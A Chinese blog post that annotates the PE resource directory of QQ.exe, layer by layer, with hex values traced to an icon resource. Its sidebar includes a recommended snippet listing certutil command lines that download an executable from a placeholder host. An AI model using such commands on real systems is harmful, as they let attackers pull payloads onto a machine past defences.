分析QQ.exe资源目录结构

最新推荐文章于 2018-01-24 12:56:37 发布
最新推荐文章于 2018-01-24 12:56:37 发布
阅读量2k 收藏
点赞数 2
分类专栏: PE 文章标签: image struct qq exe 工具 c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gaoxin1076/article/details/7497724
版权

看完视频想自己动手实践一下看看QQ.exe的PE格式

2012版的qq中protect版本和本来的版本是有大的不一样的。这里从两个exe文件大小的不同就可以看出来了。这里就先分析一下普通的qq.exe文件好了。

首先用Resource Hacker工具查看一下资源文件,发现在图标这一栏里面有8只大小不一样的企鹅。。。。。。

我这里第4只好像特别大。。。。这里就先分析下第1只企鹅的图标资源吧。。。。

关于资源表这里就不特别讲解了,大家可以参考一下小甲鱼的课件,讲的很清楚的哦。

http://www.fishc.com/a/shipin/jiemixilie/_PExilie_/1051.html

这里就把课件里面的一张最重要的图片贴出来吧:


然后自己就跟着这张图片还有小甲鱼的讲解自己也演练了一遍:

/*
		qq.exe resource analyse
		by Miibotree
*/
//块对齐和文件对齐都是1000H  所以这里的RVA和offset是一样的,方便了计算
//资源表的RVA是1A000  大小是10790
//第四个区块.rsrc的起始地址是1A000 大小是10790 说明这个区块里面存的全部都是资源
//然后用WinHex打开qq.exe正式来分析一下

//第一层目录 资源类型
typedef struct _IMAGE_RESOURCE_DIRECTORY {
    DWORD   Characteristics;   		00 00 00 00H
    DWORD   TimeDateStamp; 			00 00 00 00H
    WORD    MajorVersion;      		00 04H
    WORD    MinorVersion;      		00 00H
    WORD    NumberOfNamedEntries; 	00 00H
    WORD    NumberOfIdEntries;      00 04H//这里说明有4种资源类型
//  IMAGE_RESOURCE_DIRECTORY_ENTRY DirectoryEntries[];
} IMAGE_RESOURCE_DIRECTORY, *PIMAGE_RESOURCE_DIRECTORY;

typedef struct _IMAGE_RESOURCE_DIRECTORY_ENTRY {
    union {
        struct {
            DWORD NameOffset:31;
            DWORD NameIsString:1;
        };
        DWORD   Name;
        WORD    Id;
    };
    union {
        DWORD   OffsetToData;
        struct {
            DWORD   OffsetToDirectory:31;
            DWORD   DataIsDirectory:1;
        };
    };
} IMAGE_RESOURCE_DIRECTORY_ENTRY, *PIMAGE_RESOURCE_DIRECTORY_ENTRY;
//			name           OffsetToData
//一。1 	0000 0003H	    8000 0030H 图标  8(十六进制) = 1000(二进制)最高位为1,低31位作为指针使用
//一。2	    0000 000EH		8000 0080H 版本信息
//一。3		0000 0010H		8000 0098H qq自定义的
//一。4		0000 0018H		8000 00B0H 应该也是qq自定义的
//一。5 	0000 0000H		0000 0000H 最后一个全部都是0表示结束了吧
//第一层结束,我们首先追踪一下qq图标吧,所以先飞到第二层去了,哈哈

//第二层目录  资源ID
//一.1.二
typedef struct _IMAGE_RESOURCE_DIRECTORY {
    DWORD   Characteristics;   		00 00 00 00H
    DWORD   TimeDateStamp; 			00 00 00 00H
    WORD    MajorVersion;      		00 04H
    WORD    MinorVersion;      		00 00H
    WORD    NumberOfNamedEntries; 	00 00H
    WORD    NumberOfIdEntries;      00 08H//这里说明有8个图标
//  IMAGE_RESOURCE_DIRECTORY_ENTRY DirectoryEntries[];
} IMAGE_RESOURCE_DIRECTORY, *PIMAGE_RESOURCE_DIRECTORY;

//一。1.二。1-8
//			name           OffsetToData
//			0000 0001H		8000 00C8H
//			0000 0002H		8000 00E0H
//			0000 0003H		8000 00F8H
//			0000 0004H		8000 0110H
//			0000 0005H		8000 0128H
//			0000 0006H		8000 0140H
//			0000 0007H		8000 0158H
//			0000 0008H		8000 0170H
//			0000 0000H		0000 0000H
//第二层结束,飞到第三层去吧,呵呵呵呵

//第三层目录  资源代码页
//一。1.二。1。三
typedef struct _IMAGE_RESOURCE_DIRECTORY {
    DWORD   Characteristics;   		00 00 00 00H
    DWORD   TimeDateStamp; 			00 00 00 00H
    WORD    MajorVersion;      		00 04H
    WORD    MinorVersion;      		00 00H
    WORD    NumberOfNamedEntries; 	00 00H
    WORD    NumberOfIdEntries;      00 01H//这里说明只有一个资源代码页
//  IMAGE_RESOURCE_DIRECTORY_ENTRY DirectoryEntries[];
} IMAGE_RESOURCE_DIRECTORY, *PIMAGE_RESOURCE_DIRECTORY;

//一。1.二。1。三。1
//			name           OffsetToData
//			0000 0409H	   0000 01D0H
//			0000 0000H	   0000 0000H
//第三层结束,离我们的最终胜利越来越近了,加油啊啊啊啊啊

//节点 资源数据指针
//一。1.二。1。三。1。四
IMAGE_RESOURCE_DATA_ENTRY STRUCT

    OffsetToData     DWORD     ?    ; 资源数据的RVA  	00 01 A2 80H
    Size             DWORD     ?    ; 资源数据的长度 	00 00 01 28H 
    CodePage         DWORD     ?    ; 代码页, 一般为0	00 00 04 E0H
    Reserved         DWORD     ?    ; 保留字段			00 00 00 00H

IMAGE_RESOURCE_DATA_ENTRY ENDS
//节点 资源数据指针结束,现在终于可以进入我们的最终小企鹅图标的庐山真面目了。。。

//图标资源
//1A280 - 1A3A8

最后得到了图标资源的位置。用eXeScope打开看一下,发现是一样的。呵呵,简单就分析到这里了。

大笑大笑



Miibotree
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Delphi开发范例宝典目录
03-07
实例166 将WAV资源添加到EXE里 213 第5章 文件系统 215 5.1 创建和删除文件 216 实例167 创建和删除文件夹 216 实例168 建立临时文件 217 实例169 根据日期动态建立文件 218 实例170 把文件删除到回收...
网管教程 从入门到精通软件篇.txt
04-25
如果不能在启动目录(默认为 %systemroot%System32)中找到该文件,将试着在 Windows 安装 CD 中找到它。如果有多引导系统的计算机,必须保证是在包含 Windows 的驱动器上使用该命令。 Diskpart  创建和删除硬盘...
分析EXE资源的Idc代码
weixin_34218890的博客
12-20 71
//以前写的IDC代码,现在把它贴出来,供参考。[email protected]. // This is an example how New Executable Format resources can be // analyzed. // //-----------------------------------------------------------...
一般Java Web的项目目录结构(转)
iteye_12601的博客
03-25 644
WebRoot- -common (系统框架公用jsp 如footer.jsp,header.jsp) -images -scripts (javascript库等) -styles - (css模版) - css 风格1 - ...
QQ2010的个人文件夹结构
kerson的专栏
10-20 1919
<br />QQ2010的个人文件夹结构和以前大不一样。存储方式也变化很大。<br />  研究了一下,我把这些目录和文件的作用列举出来,如有错误,欢迎补充和纠正。<br />  QQ2010的个人文件夹一般位于“我的文档”下的“Tencent Files”下面。<br />  │ <br />  └─Tencent Files<br />  ├─172437217 自己的QQ号<br />  │ │ CustomFace.db 自定义表情,可以用7ZIP解压出来<br />  │ │ CustomFace
文件和目录在存储的存储结构
qq_38365116的博客
01-24 4152
文件系统的三个区域分别为:(1)超级块(2)i-节点表(3)数据区 超级块存放文件系统本身的结构信息。i-节点表存放文件本身的属性(*i-节点在文件系统中的位置是固定的,序号从0开始)。 数据区存放文件的内容。 创建文件的过程:  (1)、内核先找到一个空的i节点。将文件属性存储在i节点中  (2)、将文件的内容存在数据块中。  (3)、将文件内容在数据块中的序号按文件内容的先后顺序存
星星火新闻发布系统
02-23
*nix的服务器生成*.tar.gz Windows的生成 Rar│ Rar.exe│ rarreg.key│ ├─js //JS文件目录│ manage.js│ ├─sources //每个子功能模块的源文件目录│ │ │ ├─admins //后台管理每个子功能模块的源文件目录│...
DLL函数查看器V3.5
07-24
*修复部分EXE文件导入表函数反汇编无识别的问题 *修复"总在最前"时"选项设置"窗口无法显示的问题 *修复数据处理等待画面引起的程序意外退出的问题 DLL函数查看器V3.3 (2011.08.28) =========================== *...
QQ 项目分析
02-19
QQ分析,基本的几个功能,对于初学者还是很不错的
政务信息资源目录体系——总体框架
06-19
政务信息资源目录体系——总体框架
EXE文件分析器(可以给EXE资源编辑)
01-28
可以给EXE资源编辑 可以编辑外挂补丁等其他的资源 功能很强大的哦
据说是新浪内部对腾讯公司的深度解析
01-29
据说是新浪内部对腾讯公司的深度解析,腾讯微信等产品.
QQ所有文件和目录详细分析
GeneralYY0的专栏
08-29 3460
http://www.lewensky.cn/read.php/71.htm QQHangReport.lnk 错误汇报执行文件的快捷方式  QQIEHelper.dll ie插件,可单独删除  QQLiveUpdate.exe 在线升级执行文件,可单独删除  QQlog 临时文件,可单独删除  QQMail.exe 信箱执行文件,这个删除.相关的都可以删除  QQMail
读取PE文件的资源
weixin_33910460的博客
09-10 414
    在上一篇文章里,已经讲解了加载PE文件的导入表。本篇简要介绍PE文件的资源表的结构和定位方式。 所谓资源表(resource table),就是通常在IDE的资源视图中所看到的那个Tree视图,因此资源表在PE文件中同样是这样的一种类似资源管理器一样的树状逻辑结构。     对树,我们不能想类似导入表那样当作线性表中的数组去比较简单直观的加载,而是要用递归函数去重建,这是因为树的定义就...
Writefile与SetFilePointer函数的使用
热门推荐
Miibotree
04-10 1万+
尝试着在磁盘中修改PE文件。用到writefile和SetFilePointer这两个函数 下面先来看看这两个函数: Syntax DWORD WINAPI SetFilePointer( __in HANDLE hFile, __in LONG lDistanceToMove, __inout_opt PLONG lpDis
PE格式之DOS头+PE头
Miibotree
04-06 5647
清明节回来乘车到学校,没想到竟然做错了公交车。来回竟然多花了3个小时。。。。。。车子又挤。真的快无语了。 所以写下代码来泄愤。。。。 首先给大家推广下小甲鱼的网站 http://fishc.com/  小甲鱼是个大帅锅(。。。。) 这个网站做的很齐全,里面讲汇编,PE,破解等很多好的资源。小甲鱼的视频讲解也是很详细的。自己看完书再看一遍小甲鱼的视频,最后自己再写代码巩固一下,感觉学习效果还
PE格式之输入表
Miibotree
04-15 3166
紧接着上一篇的千里追踪输入表,现在终于可以开始看输入表里面的神奇东东了。。。 还是copy小甲鱼的课件。。。。 输入表结构 回顾一下,在 PE文件头的 IMAGE_OPTIONAL_HEADER 结构中的 DataDirectory(数据目录表) 的第二个成员就是指向输入表的。而输入表是以一个 IMAGE_IMPORT_DESCRIPTOR(简称IID) 的数组开始。每个
PE格式之千里追踪输入表
Miibotree
04-15 2755
高数考完了,终于可以轻松的写代码了。哈哈 终于开始写输入表了。输入表是我们项目的重头戏。首先还是先介绍下输入表的基本知识。 自己写的话有点麻烦,还是copy一下小甲鱼辛辛苦苦打出来的课件吧 输入表结构 PE文件头的 IMAGE_OPTIONAL_HEADER 结构中的 DataDirectory(数据目录表) 的第二个成员就是指向输入表的。而输入表是以一个 IM
certutil.exe
最新发布
08-20
certutil.exe 是一个 Windows 操作系统中的命令行实用程序,用于与证书服务进行交互并执行各种操作。它可以用于下载文件,其中包括通过使用以下命令进行下载的方法:certutil -urlcache -split -f http://ip/artifact.exe。 此外,还有另一种方法可以使用 certutil.exe 进行文件下载,即使用 Windows 自带的分隔符 & 和 |。本质上,这种方法与第一种方法相似,相当于执行了两次 certutil 命令,具体命令如下:certutil & certutil -urlcache -split -f http://ip/artifact.exe certutil | certutil -urlcache -split -f http://ip/artifact.exe。 还有一种方法是先执行一个单独的 certutil 命令,然后再执行下载 artifact.exe 的命令。这样做可以确保成功下载文件,具体命令如下:certutil certutil -urlcache -split -f http://ip/artifact.exe。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [关于certutil的探究](https://blog.csdn.net/qq_50854790/article/details/128816819)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值